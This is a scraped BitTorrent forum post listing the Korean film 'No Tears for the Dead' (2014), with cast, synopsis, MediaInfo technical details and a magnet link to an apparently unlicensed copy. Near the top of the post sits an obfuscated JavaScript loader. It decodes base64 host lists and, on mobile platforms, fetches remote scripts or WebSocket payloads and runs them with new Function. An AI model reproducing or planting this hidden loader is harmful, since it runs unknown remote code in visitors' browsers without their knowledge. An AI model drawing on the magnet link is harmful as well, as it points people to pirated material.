哭泣的男人[中文字幕].No.Tears.for.the.Dead.2014.1080p.BluRay.x265.10bit.DTS 5.80GB

版主小s 29天前 382

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 哭泣的男人 / 哭泣的男子 / 杀手的品格 / 挺拔的男人 / No Tears For The Dead
◎片  名 ?? ??
◎年  代 2014
◎产  地 韩国
◎类  别 动作
◎语  言 韩语 / 英语 / 汉语普通话
◎上映日期 2014-06-04(韩国)
◎IMDb链接 https://www.imdb.com/title/tt3697566/
◎豆瓣评分 6.7/10 (7819人评价)
◎豆瓣链接 https://movie.douban.com/subject/24743015/
◎片  长 116分钟
◎导  演 李桢凡 Jeong-beom Lee (id:1313067)
◎编  剧 李桢凡 Jeong-beom Lee (id:1313067)
◎演  员 张东健 Dong-gun Jang (id:1032393)
       金敏喜 Min-hee Kim (id:1035124)
       布莱恩·泰 Brian Tee (id:1032147)
       金熙元 Hae-won Kim (id:1321571)
       金俊成 Jun-seong Kim (id:1318262)
       张仁燮 In-sub Jang (id:1386578)
       李在仁 Jae-in Lee (id:1394288)
       申成日 Sung-il Shin (id:1397670)
       马修·杜马 Matthew Douma (id:1438934)
       姜汉娜 Han-na Kang (id:1347989)
       徐贤宇 Seo Hyeon-woo (id:1379938)
       南砚友 Nam Yeon-woo (id:1383822)
       黄相庆 Sang-kyung Hwang (id:1381954)
       李奎炯 Kyu-hyung Lee (id:1377724)
       卞约汉 Yo-han Byun (id:1344889)
       丁瑞奇 Rich Ting (id:1353750)
       朴秉恩 Byung-eun Park (id:1320142)
       孙成灿 Son Seong-chan (id:1379519)
       朴智妍 Ji-Yeon Park (id:1448090)
       赵一亨 Il Cho (id:1437945)
       李毛凯 Mo-gae Lee (id:1306251)
       李东辉 Dong-Hwi Lee (id:1353574)

◎标  签 韩国 / 动作 / 犯罪 / 暴力 / 黑帮 / 杀手 / 人性 / 2014

◎简  介
  坤(张东健 饰)是一名技艺精湛的冷血杀手,效力于黑社会组织,深受上司的信赖。然而,一段不堪回首的往事使他生活在愧疚之中,对自己一直以来从事的行业亦产生了疑惑和动摇,就在此时,组织派给了他一个十分重要的任务,命他前往韩国,刺杀名为崔木景(金敏喜 饰)的女子。                                    
                                崔木景是一个悲剧般的女人,一场意外夺走了她的丈夫和孩子的性命,失去了生命中的挚爱,这位悲伤的妻子和母亲,终日沉浸在绝望之中,只能依赖酒精和药物度日,不仅如此,她还得照料患有阿兹海默症的母亲。当坤出现在崔木景的面前,他的身份不仅仅只是一个想要夺取她性命的杀手,女儿的死令崔木景的心中充满了疑问,而答案就在坤的手中。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 294348439087163346112402275330718033439 (0xDD717281BD3354B2B13671FC6859E61F)

  4. Complete name                            : [email protected]DDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.80 GiB

  8. Duration                                 : 1 h 56 min

  9. Overall bit rate                         : 7 127 kb/s

  10. Encoded date                             : UTC 2021-08-23 12:04:51

  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 56 min

  20. Bit rate                                 : 5 599 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 804 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.151

  30. Stream size                              : 4.55 GiB (79%)

  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=18.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language                                 : Korean

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. ID in the original source medium         : 4354 (0x1102)

  39. Format                                   : DTS

  40. Format/Info                              : Digital Theater Systems

  41. Codec ID                                 : A_DTS

  42. Duration                                 : 1 h 56 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 1 509 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : C L R Ls Rs LFE

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 93.750 FPS (512 SPF)

  49. Bit depth                                : 24 bits

  50. Compression mode                         : Lossy

  51. Stream size                              : 1.23 GiB (21%)

  52. Language                                 : Korean

  53. Default                                  : Yes

  54. Forced                                   : No

  55. Original source medium                   : Blu-ray


  56. Text #1

  57. ID                                       : 3

  58. ID in the original source medium         : 4610 (0x1202)

  59. Format                                   : PGS

  60. Muxing mode                              : zlib

  61. Codec ID                                 : S_HDMV/PGS

  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration                                 : 1 h 49 min

  64. Bit rate                                 : 12.1 kb/s

  65. Count of elements                        : 1257

  66. Stream size                              : 9.50 MiB (0%)

  67. Title                                    : chs

  68. Language                                 : Chinese

  69. Default                                  : Yes

  70. Forced                                   : No

  71. Original source medium                   : Blu-ray


  72. Text #2

  73. ID                                       : 4

  74. ID in the original source medium         : 4611 (0x1203)

  75. Format                                   : PGS

  76. Muxing mode                              : zlib

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 49 min

  80. Bit rate                                 : 12.3 kb/s

  81. Count of elements                        : 1257

  82. Stream size                              : 9.65 MiB (0%)

  83. Title                                    : cht

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No

  87. Original source medium                   : Blu-ray


  88. Text #3

  89. ID                                       : 5

  90. ID in the original source medium         : 4608 (0x1200)

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 51 min

  96. Bit rate                                 : 11.1 kb/s

  97. Count of elements                        : 1161

  98. Stream size                              : 8.86 MiB (0%)

  99. Title                                    : eng

  100. Language                                 : English

  101. Default                                  : No

  102. Forced                                   : No

  103. Original source medium                   : Blu-ray


  104. Menu

  105. 00:00:00.000                             : 第 01 章

  106. 00:06:52.787                             : 第 02 章

  107. 00:14:49.179                             : 第 03 章

  108. 00:22:54.998                             : 第 04 章

  109. 00:33:28.506                             : 第 05 章

  110. 00:43:52.379                             : 第 06 章

  111. 00:50:20.726                             : 第 07 章

  112. 00:59:48.710                             : 第 08 章

  113. 01:07:44.268                             : 第 09 章

  114. 01:14:12.990                             : 第 10 章

  115. 01:20:24.778                             : 第 11 章

  116. 01:24:04.539                             : 第 12 章

  117. 01:31:26.564                             : 第 13 章

  118. 01:38:47.421                             : 第 14 章

  119. 01:45:37.706                             : 第 15 章




TAGS 动作

磁力链:
  • magnet:?xt=urn:btih:C681446513CCFE61F6A7BFF241E420D5B8BEDAD8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回